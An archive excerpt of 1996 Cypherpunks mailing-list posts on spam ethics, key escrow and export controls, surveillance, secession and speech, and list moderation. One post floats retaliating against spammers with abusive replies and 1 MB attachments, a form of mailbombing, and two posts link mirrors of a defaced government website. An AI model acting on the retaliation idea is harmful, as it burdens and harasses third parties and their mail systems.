>is increasing. I would be interested in hearing why you think it
>will ever drop to zero.

It's because the locals don't NEED a subsidy.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Thu, 22 Aug 1996 08:02:59 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: RC4 RC2 & MD5???
Message-ID: <9608211258.aa00158@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


I assume then that the Netscape encryption is Symetric Key, so how do
RC4 RC2 and MD5 compare and contast? TIA   
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Thu, 22 Aug 1996 09:24:47 +0800
To: jbugden@smtplink.alis.ca
Subject: RE: Canada Imprisons People For Human Rights Activity
In-Reply-To: <9607218406.AA840654179@smtplink.alis.ca>
Message-ID: <Pine.GUL.3.95.960821125328.17847D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996 jbugden@smtplink.alis.ca wrote:

> Nota: Quebec recently held a referendum on seperation from Canada. 
> Just talk about secession of a state in the U.S., and you'll quickly see
> which country makes political ideas illegal.

You mean stuff like this? :-)

 http://www.softdisk.com/comp/dan/politics/parties.html#Seccession

The one about the Provisional Government of the Republic of Texas is a hoot. 
The reason you don't hear people wanting to secede from the US is, well,
they don't want to, not because we can't take it. That little incident in
the 1860's was really an international conflict, not a secession.

Some other entertaining sites that would probably be frowned upon in
lily-livered Canada include: 

 http://www.nationalist.org/platform.html#Social
 http://www.natvan.com/WHAT/na2.html#aryan

Back to Zundel, the full text of the Supreme Court decision is at
http://www.nizkor.org/hweb/people/z/zundel-ernst/supreme-court/ The
reasoning is rather different than what you said, but maybe you were
thinking of the earlier postal decision, which I haven't read. The latest
attempt at a criminal charge never even got to trial. 

I also just received a copy of Judge Heald's ruling on the citizenship
matter. Unfortunately, it's a second-generation Xerox that my OCR software
just looks at and laughs. I'll key it in manually if I ever find the time. 
Essentially, it says the government either has to give him citizenship or
change the law, because the only body that is legally empowered to advise
the Crown whether he's a threat to Canadian society or "of bad charater" has
already concluded that he is, so it can't be objective. Very strange
reasoning, but I agree with the outcome. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 22 Aug 1996 09:27:26 +0800
To: "Ross Wright" <jim@ACM.ORG
Subject: [rant] Re: Spamming (Good or Bad?)
Message-ID: <2.2.32.19960821203026.00c82314@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:49 PM 8/20/96 +0000, Ross Wright wrote:
>On Or About 20 Aug 96, 16:23, Jim Gillogly wrote:
>> 
>> Vipul Ved Prakash <vipul@pobox.com> writes:
>> >I don't know if there has been much discussion on the ethics of
>> >spamming here? Is spamming free speech? 
>> 
>
>> I oppose spamming because it's rude and inefficient, lowering the
>> S/N everywhere it happens.  Market droids
>
>Market Droids????  As a salesman I take offence at this slur.

It is a mild term compared to some of the things that could be said about sales.

I have dealt with far too many sales people.  Few of them knew anything
about the products that they were selling.  (This is especially true of the
computer field.  "Do you know the difference between a computer salesman and
a car salesman?  The car salesman knows how to drive.")

Many people have a bad view of sales.  

<rant>
Mine is because of the times I have had to create the programs that sales
had promised, but had no clue as to what could and could not be done, or was
even practical.  Getting time lines set by people who have no clue as to how
long it will take or even if what they want is possible.  (More than once I
have received requests based on the pipe dreams of some idiot in sales that
contained contradictory requirements and/or absurd time lines.)

Most sales people do not care about what it takes to do something, all they
care about is making the sale.  What they tell the rube in the course of
selling it does not matter.  (Someone else will take care of it.)

But then, rarely does truth enter into the matter of sales...

Sales people have a bad reputation for a very good reason.  If they actually
had a basic understanding of what they were selling, and were not so
untrustworthy as to not commit to things that are not deliverable, they
would have that reputation.

The only people I have more contempt for than salesmen are salesmen for
multi-level companies.  (Except maybe government officials, but that is on a
case by case basis...)
</rant>

>> favor it because it's
>> cheap, and no matter how many people they piss off bigtime, they
>> make some sales.
>
>Even make sales to people who are pissed off at first...

"Never underestimate the power of human stupidity."

The biggest problem I have had with spammers in the last month or so are the
ones who insist on forging e-mail reply addresses.  Of course, being from a
sales background, they were too incompetent to cover up their tracks.
(Remember:  If you are going to post spam with a forged return address,
DON'T do it from your own uucp address.  The send path makes a great big
arrow pointing back to you.)

Spammers are more like the people who call you at home and try to sell you
things you do not want over the phone with recorded messages.

Sales on the Internet can be done and done without pissing off people.  But
what it takes is a shred of a clue.  By violating netiquite, the spammer has
shown that he lacks vital connection to anything resembling a clueserver.
Furthermore, much of what is spammed is either illegal (variants on the
"make money fast" idea of pyramid scheme) and/or posted to entire
hierarchies of groups.  (Most mail readers will not allow you to mark a
message as read in all of the newsgroups it is posted to.  And most of the
Windows newsreader do not have killfiles or they are buggy to the point of
unusability.)  I certainly do not want to read this crap over and over again.  

It is this repeated abuse that gets spammers mailbombed, feeds killed, etc. 

(And I will not even go into the type of sales promoted by Canter and Siegal
in their book on Internet sales.  Of course, considering their background
(i.e. lawyers for the Church of Scientology) it does not surprise me a whole
lot...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 22 Aug 1996 07:34:15 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Airport legal question
Message-ID: <2.2.32.19960821203637.00c65588@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM 8/21/96 -0800, jim bell wrote:

>>7/23:  "I don't have a bomb in the bag."
>>7/24:  "Well no, I left my pipe bomb at home."
>>8/1:  "It's not as if we were Swedish and here to blow up the airport."
>
>
>I wonder how they determined that the lines above were "bomb threats."

They contain the word "bomb".  Bombs are "threatening".  Therefore they are
"bomb threats".

Isn't authoritarian logic fun?
---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Thu, 22 Aug 1996 08:24:15 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.3.89.9608211152.A29889-0100000@netcom>
Message-ID: <199608212046.NAA23129@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



"Paul S. Penrod" <furballs@netcom.com> writes:
>Practically, it would be better to allow and promote a technological 
>outlet for all of this, as it will never go away, so long as the medium 
>exists.

The technological outlet already exists: polite marketers use Web pages,
so that people who are interested in their offerings can find them using
one of the search engines.  Market droids (get over it, dude) are
unwilling to reach only people who are interested in their products.

	Jim Gillogly
	Trewesday, 29 Wedmath S.R. 1996, 20:45




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 22 Aug 1996 08:25:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.3.89.9608211303.A23772-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


HP is in the process of ramroding a pro-GAK, pro-export control 
resolution through CommerceNet
Here are the details.
HP is marketing several DES products that currently can not be sold 
abroad. In order to be allowed to sell these products, HP is willing to 
give the USG the following in return:

1.  Support by CommerceNet to have GAK built into the (inevitable) 
domestic PKI.
2.  Support by CommerceNet for export restrictions on stronger forms of 
crypto than DES as well as restrictions on export of crypto for products 
not directly related (in HP
This ill conceived attempt to use CommerceNet
--Lucky







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 22 Aug 1996 08:20:17 +0800
To: cypherpunks@toad.com
Subject: HP supporting GAK, export controls
Message-ID: <Pine.3.89.9608211309.A23772-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


[Sorry, the last one went out without a subject]

HP is in the process of ramroding a pro-GAK, pro-export control 
resolution through CommerceNet's public policy working group.

Here are the details.

HP is marketing several DES products that currently can not be sold 
abroad. In order to be allowed to sell these products, HP is willing to 
give the USG the following in return:


1.  Support by CommerceNet to have GAK built into the (inevitable) 
domestic PKI. [Their presentation included the word "voluntary". When I 
asked what was meant by that, I got the reply "There are many 
interpretations of the word "voluntary"." Suffice to say there are 
fundamental differences in what I mean by "voluntary" and what their 
proposal would require the definition of "voluntary" to be.]

2.  Support by CommerceNet for export restrictions on stronger forms of 
crypto than DES as well as restrictions on export of crypto for products 
not directly related (in HP's opinion) to ecommerce, such as email.

This ill conceived attempt to use CommerceNet's clout as industry 
organization to liberalize export rules on HP's products, and those of a 
few other companies supporting HP in this effort, at a heavy cost to 
everybody else, must be stopped. Please let HP know how you feel about 
their initiative and encourage CommerceNet to adopt an anti-GAK, 
anti-export control position.

--Lucky







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Wilson <0005514706@mcimail.com>
Date: Thu, 22 Aug 1996 08:05:01 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Remailer chain design docs?
Message-ID: <04960821191740/0005514706DC1EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


Would somebody be so kind as to point me at the design documentation for
remailers and chain remailers?  I feel a need to code, and want to see
the design on the current systems before I jump in.  Danke, MW





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 22 Aug 1996 09:10:27 +0800
To: cypherpunks@toad.com
Subject: Any CPs in D.C.?
Message-ID: <Pine.3.89.9608211445.A23772-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


I will be in D.C. through Saturday. I'd like to meet some Cypherpunks 
that feel like getting to know what Lucky looks like :-)

If you are in D.C., give me a call at my hotel.
(202) 682-0111 x440

--Lucky







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Thu, 22 Aug 1996 09:02:41 +0800
To: cypherpunks@toad.com
Subject: Ruritania
Message-ID: <2.2.16.19960821191809.377f6c4c@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


                      The Legend of Ruritania

There was once a far away land called Ruritania, and in this land there was
a strange phenomenon  --  all the trees that grew there were transparent. 
In the old days, the people had lived in mud huts.   But now, high-tech wood
technology had been developed,  and in this new age of wood, everyone in
Ruritania found that their homes were all 100% see through. 

Now, until this point, no one ever thought of allowing the police to spy on
someone's home. But the new technology made this tempting. This being a
civilized country, however, warrants were required to use binoculars and
watch someone in their home. The police, taking advantage of this, would
get  warrants  to  use  binoculars  and peer in to see what was going on. 
Occasionally, they would use binoculars without a warrant, but everyone
pretended that this didn't happen. 

One day, a smart man invented paint -- and the people found that if they
painted their houses, suddenly the police couldn't watch all their actions
at will. Things would go back to the way they were in the old age -- 
completely private.

Indignant, the state decided to try to require that all homes have video
cameras installed into every nook and cranny.   "After all", they said,
"with this new 'paint' development, crime could run rampant. Installing
video cameras doesn't mean that the police get any new capability -- 
they are just keeping the old one."

A wise man pointed out that citizens were not obligated to make the
lives of the police easy, that the police had survived all through the mud
hut  age  without  being  able  to  watch  the  citizens at will,  and that 
Ruritania  was  a  civilized  country  where  not  everything  that  was 
expedient was permitted. For instance, in a neighboring country, it had
been discovered that torture was an extremely effective way to solve
crimes.   Ruritania had banned this practice long ago, in spite of its 
expedience.   Indeed, "why have warrants at all", he asked, "if we are 
interested only in expedience?" 

A famous paint technologist, Dorothy Quisling, intervened however.  She 
noted that people might take photographs of children masturbating should
this new paint technology be widely deployed without safeguards, and the 
law was passed.

Soon it was discovered that some citizens were covering their mouths 
while speaking to each other, thus preventing the police from reading 
their lips through the video cameras. This had to be prevented, the police
 said. After all, it was preventing them from conducting their lawful
 surveillance. 

The wise man pointed out that the police had never before been allowed 
to listen in on people's homes, but Dorothy Quisling pointed out that 
people might  use  this  new  invention  of  covering  their mouths 
with veils to discuss the kidnapping and mutilation of children. 

Now, no one in the legislature  wanted  to be accused  of being in favor of 
mutilating children, but then again, no one wanted to interfere in people's
rights to wear what they liked, so a compromise was reached whereby all
homes had to have microphones installed in each room to accompany the 
video cameras. The wise man lamented few if any child mutilations had 
ever been solved by the old lip reading technology, but it was too late --
the new law was passed  and microphones were installed everywhere.

However, soon it was discovered that this was insufficient to prevent
citizens from hiding information from the authorities, because some of
them  would  cleverly  speak  in  languages  that  the police  could  not 
understand. So, another new law was proposed to force all citizens to
speak at all times only in Ruritanian, and, for good measure, to require 
that they speak clearly and distinctly near the microphones. "After all",
Dorothy Quisling pointed out, "they might be using the opportunity to 
speak in private to mask terrorist activities!" Terrorism struck terror
into everyone's hearts, and they rejoiced at the brilliance of this new
law. 

Meanwhile, the wise man talked one evening to his friends on how all of
this was making a sham of the  constitution of  Ruritania, of which all
Ruritanians were proud. "Why", he asked, "are we obligated to sacrifice 
all our freedom and privacy to make the lives of the police easier? 
There isn't any real evidence that this makes any big dent in crime,
 anyway! All it does is make our privacy forfeit to the state!" 

However, the wise man made the mistake of saying this, as the new law
required, in Ruritanian, clearly and distinctly, and near a microphone. 
Soon, the newly formed Ruritanian Secret Police arrived and took him off,
and got him to confess to crimes by torturing him. Torture was, after all,
far more efficient than the old methods, and had been recently instituted
to stop the recent wave of people thinking obscene thoughts about tomatoes,
which Dorothy Quisling noted was one of the major problems of the new age
of plenty and joy.
Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 22 Aug 1996 07:44:29 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <9607218406.AA840654179@smtplink.alis.ca>
Message-ID: <199608211933.OAA29688@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jbugden@smtplink.alis.ca wrote:
> Nota: Quebec recently held a referendum on seperation from Canada.=20
> Just talk about secession of a state in the U.S., and you'll quickly see wh=
> ich
> country makes political ideas illegal.
> 

OK, so what would happen if I organized a party with the proclaimed goal
of secession of Oklahoma from the United States?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 22 Aug 1996 08:57:56 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608212138.OAA07368@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 8/21/96 -0400, Brian Davis wrote:
>On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
>
>> Rush Limbaugh reports:
>> 
>> That a husband and wife are being jailed for yelling to Clinton "You Suck".
>> 
>> The Secret Service states additional words (yet un-uttered to the rest of 
us)
>> were mentioned that they deemed threatening.
>
>
>"I hope you die." 

Doesn't sound much like a "threat" to me.

> And the couple was arrestd for disorderly conduct by 
>Chicago police. 

It sounds to me like the Chicops were just showing their "loyalty" by 
sitting on somebody, not that they believed any real crime had been committed.

> Any possible federal charges for threatening a president 
>in violation of 18 U.S.C. Section 871 await a determination of the 
>seriousness of the statement, in context with the wife's conduct, by 
>prosecutors.  I predict no action.

But it isn't even a "threat", regardless of how "serious" it was.   The "I 
hope you die"  part is, presumably, a statement of fact:  She did, indeed, 
hope he dies.  But I don't see how hoping this can be considered a threat, 
or even SAYING she's hoping this is, likewise.


Makes me wonder whether visiting one of these appearances with a "Clinton 
Doll" and a bunch of pins, and visibly inserting those pins into the doll 
(while uttering various strange incantations), would constitute a "threat."

Frankly, I'd rather have a president who didn't feel the need to be 
protected by thugs.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 22 Aug 1996 08:52:25 +0800
To: Scottauge@aol.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <960820183645_506047852@emout10.mail.aol.com>
Message-ID: <Pine.BSF.3.91.960821144300.9917E-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996 Scottauge@aol.com wrote:

> Rush Limbaugh reports:
> 
> That a husband and wife are being jailed for yelling to Clinton "You Suck".
> 
> The Secret Service states additional words (yet un-uttered to the rest of us)
> were mentioned that they deemed threatening.


"I hope you die."  And the couple was arrestd for disorderly conduct by 
Chicago police.  Any possible federal charges for threatening a president 
in violation of 18 U.S.C. Section 871 await a determination of the 
seriousness of the statement, in context with the wife's conduct, by 
prosecutors.  I predict no action.

EBD 

> 
> Ahhh, good to live in a free country....
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 22 Aug 1996 02:34:48 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <ae3ff85d0b02100490f2@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960821144412.10644C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Timothy C. May wrote:

> There are technological fixes which I would favor over attempts to ban
> unwanted messages.

In the meantime, before these technological fixes are easily implemented,
what is the proper way to handle unwanted commercial mail?

1) delete immediately

2) reply with 'Fuck off, morons!'

3) as in 2) plus an attachment of some 1Mb file

4) as in 3) plus a CC to the postmaster of the sending site

What if the spam says: 'Do only reply to this if you want
further contact with us' etc?

Does anybody have good advice, including risks for retaliation
from the vendors/postmasters for such 're-spam'?

Asgaard 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michelle KC5KYO <mthompso@qualcomm.com>
Date: Thu, 22 Aug 1996 08:43:28 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] RE: Canada Imprisons People For Human Rights Acti...
In-Reply-To: <9607218406.AA840670454@smtplink.alis.ca>
Message-ID: <Pine.GSO.3.94.960821145137.18639C-100000@strange.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> I do not believe that freedom of speech in the U.S.A. extends to actively
> agitating for secession or the overthrow of the federal government.

The right to discuss revolt or secession or the overthrow of the federal
government, it seems to me, is given below:

"We hold these Truths to be self-evident, that all Men are created
equal, that they are endowed by their Creator with certain unalienable
Rights, that among these are Life, Liberty, and the Pursuit of 
Happiness - That to secure these Rights, Governments are instituted
among Men, deriving their just Powers from the Consent of the
Governed, that whenever any Form of Government becomes destructive of
these Ends, it is the Right of the People to alter or to abolish it,
and to institute new Government, laying its Foundation on such
Principles, and organizing its Powers in such Form, as to them shall
seem most likely to effect their Safety and Happiness.  ... "

Now this is the Declaration of Independence, and not the Constitution, but
it seems to me that the right to discuss "agitating for secession or the
overthrow of the federal government" is protected.

Michelle





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 22 Aug 1996 08:43:20 +0800
To: perry@piermont.com
Subject: Re: Securing Internet mail at the MTA level
Message-ID: <9608212008.AA21573@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> > It's also clear to me that for E-mail, you don't want transport level
> > security for the system; you want "object" security, that is, digital
> > signature and encryption of the mail message.
> 
> Yup. This is a frequently missed point. Link security and object
> security have different uses at different times -- and people confuse
> them way too often.
> 

With the question of "Do you want object security or link security
for email?"  The answer is (as with all security questions) "What
is your threat model?"

For example:  Your company does not have mailreaders capable
of doing encryption (at least not easy enough for average users).
Your supplier has the same situation.  You have accepted 
this fact for the time being, and trust that your employees
won't tinker with the email if they want their job for long.

However, the email you send to your supplier and vice-versa 
should not go over the Internet unencrypted as it potentially 
contains sensitive information. 

So, a link-level encryption that the two co-operating 
sys-admins can set up would be a good solution.  This would
be easier to set up and maintain than a encrypted router tunnel
through the net, and solve your problem.

Of course, I'll submit that object security on email would 
be preferable, but that might not be pratical right now.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 22 Aug 1996 06:40:51 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608210340.UAA06334@adnetsol.adnetsol.com>
Message-ID: <Pine.BSF.3.91.960821150339.9917H-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


> ... 
> I pay for my net access.  I pay for my Sunday paper, it's full of ads 
> too!!  Ethics???  Let's rat out on the EVIL spammers!!  Let's turn 

When my ISP tells me that I must accept spammed advertising with my 
monthly fee, as the Sunday paper effectively does with its ads, your 
analogy might have some meaning.   And I have the option of sending the 
ads to the advertiser, telling them that the ads suck. 

Free (commercial)speech for you (perhaps at our expense), but no free 
speech for us?

EBD
  


> them into thier ISP!!!  That's a load of CRAP!!!!
> 
> Ross
> 
> ===========
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://www.slip.net/~cdr/kingmedia
> Voice: 415-206-9906
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 22 Aug 1996 09:25:32 +0800
To: cypherpunks@toad.com
Subject: www.usdoj.gov http://156.46.199.41/
Message-ID: <2.2.32.19960821224538.00678be8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


a mirror of the hack is at http://156.46.199.41/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 22 Aug 1996 09:41:21 +0800
To: cypherpunks@toad.com
Subject: 20 year key ?
Message-ID: <199608212246.PAA09169@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there such a thing as a "20 YEAR KEY "  would it be a 2048 bit or larger or what ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Thu, 22 Aug 1996 07:56:51 +0800
To: jims@MPGN.COM>
Subject: Re: Spamming
Message-ID: <199608211955.PAA01059@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain


> At 06:09 PM 8/20/96 -0700, Rich Graves wrote:
> >On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:
> >
> >> I don't know if there has been much discussion on the ethics of spamming
> >> here? Is spamming free speech? 
> >
> >Yes.
> 
> No. 

[snip]

Freedom of Speech includes freedom FROM speech.  IOW, if it starts 
infringing on your rights, then it stops.  Spam is unsolicited, 
commercial email, and it could possibly be argued that just as the 
spammer has the right to say whatever it is that he wants, we also 
have the right not to get his email.  This can also get very 
convoluted.

Besides that, it's just impolite.

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 22 Aug 1996 09:33:23 +0800
To: cypherpunks@toad.com
Subject: www.usdoj.gov mirror2
Message-ID: <2.2.32.19960821230541.00637930@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.netlite.com/ameritek/usdoj is faster than that other site





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Thu, 22 Aug 1996 09:26:27 +0800
To: cypherpunks@toad.com
Subject: Re: PreRFD: comp.org.cypherpunks
Message-ID: <2.2.32.19960821211509.006afc7c@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 8/20/96 -0700, Skip wrote:
>The Subject: line says it all.
>
>My suggestion number #1:
>
>No moderation.

I'd vote "no" to converting this list into a newsgroup.  I think universal
access to e-mail is more guaranteed than access to a news-server, especially
for those of us hidden away behind our Gestapo-run firewalls.  The mailing
list flies quite nicely through them.  Plus, we have the added benefit of
only getting crypto-related spam thrown at us occasionally, instead of the
nearly ubiquitous "Call 1-900-HOT-4U" postings that seem to flood every
Usenet group.  ('Course, I seem to recall a www.slut.com letter from someone
a few days ago...)

Plus, sci.crypt exists for those who can't get enough here.

As an aside, if an RFD should be called, to whom should we forward our
discussion?  (It's been many years since I really cared about Usenet.)

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 22 Aug 1996 09:08:11 +0800
To: OBC.qut@netcom.com (Skip)
Subject: [Noise] RE: Canada Imprisons People For Human Rights Acti...
Message-ID: <9607218406.AA840670454@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Subject: [Noise] RE: Canada Imprisons People For Human Rights Activity

jbugden@alis.com wrote:
! Nota: Quebec recently held a referendum on seperation from Canada.
! Just talk about secession of a state in the U.S., and you'll quickly see 
! which country makes political ideas illegal.

qut@netcom.com (Skip, OBC)
>Exactly, we have freedom of speech alright, everone in the world does, 
>we're allowed to say "we don't believe you should remain in power," but 
>try to say, and mean, "we're going to try to take your power from you for 
>ourselves," and your group will very quickly find out the length of your 
>chains, the extent of our so called freedom.

Actually, my comment was exactly the opposite. You may not be aware of what goes
on with your neighbour to the north, but the province of Quebec currently has a
government whose stated intention is independence from Canada. 

The recent public referendum for a mandate to seceed was defeated by a very
small margin: 51% to 49% with 95% voter turnout.

"Her majesty's loyal opposition" in the parliament (the Bloq Quebecois) has the
same raison d'etre - Independence of Quebec from Canada.

I do not believe that freedom of speech in the U.S.A. extends to actively
agitating for secession or the overthrow of the federal government.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 22 Aug 1996 09:05:31 +0800
To: cypherpunks@toad.com
Subject: Re: PreRFD: comp.org.cypherpunks
In-Reply-To: <199608211645.JAA06426@netcom.netcom.com>
Message-ID: <sD41sD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


qut@netcom.com (Skip, OBC) writes:

> ! Jim McCoy wrote:
> ! > qut@netcom.com (Skip) writes:
> ! > > My suggestion number #1:
> ! > > No moderation.
> ! > 
> ! > Suggestion 1 on how to diminish the feeble S/N ratio on cypherpunks:
> ! > 
> ! >         make it a newsgroup
> ! > Suggestion 2:
> ! >         make it an unmoderated newsgroup
> ! 
> ! How about making it a robomoderated newsgroup with only one enforced
> ! rule, forbidding any crossposting?
> 
> If moderation, then why not moderator(s) who simply send out cancel 
> messages to everthing that is crossposted?  Traditional moderated 
> newsgroups are technically inferior because all posts go through netnews 
> chokepoints and then depends on the moderator(s) who's inevitable 
> position has been the irresponsible one of keeping the position long 
> after they lose interest with the high volumes.  Even if their was such
> a person, there is still are chokepoint problem which is stupid to  
> engage in.
> 
> In any case, creation of comp.org.cypherpunks in no way means gatewaying 
> or shutting down cypherpunks@toad.com .

How about a NoCeM-moderated newsgroup?
I.e., several parties can issue 'hide' NoCeM notices for whatever
material they consider off-topic, including cross-posts. Several
other parties can issue 'highlight' NoCeM's for articles they
consider particularly worthy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 22 Aug 1996 10:53:28 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <ae40eda80f0210043236@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:47 PM 8/21/96, Brian Davis wrote:
>On Tue, 20 Aug 1996 Scottauge@aol.com wrote:
>
>> Rush Limbaugh reports:
>>
>> That a husband and wife are being jailed for yelling to Clinton "You Suck".
>>
>> The Secret Service states additional words (yet un-uttered to the rest of us)
>> were mentioned that they deemed threatening.
>
>
>"I hope you die."  And the couple was arrestd for disorderly conduct by
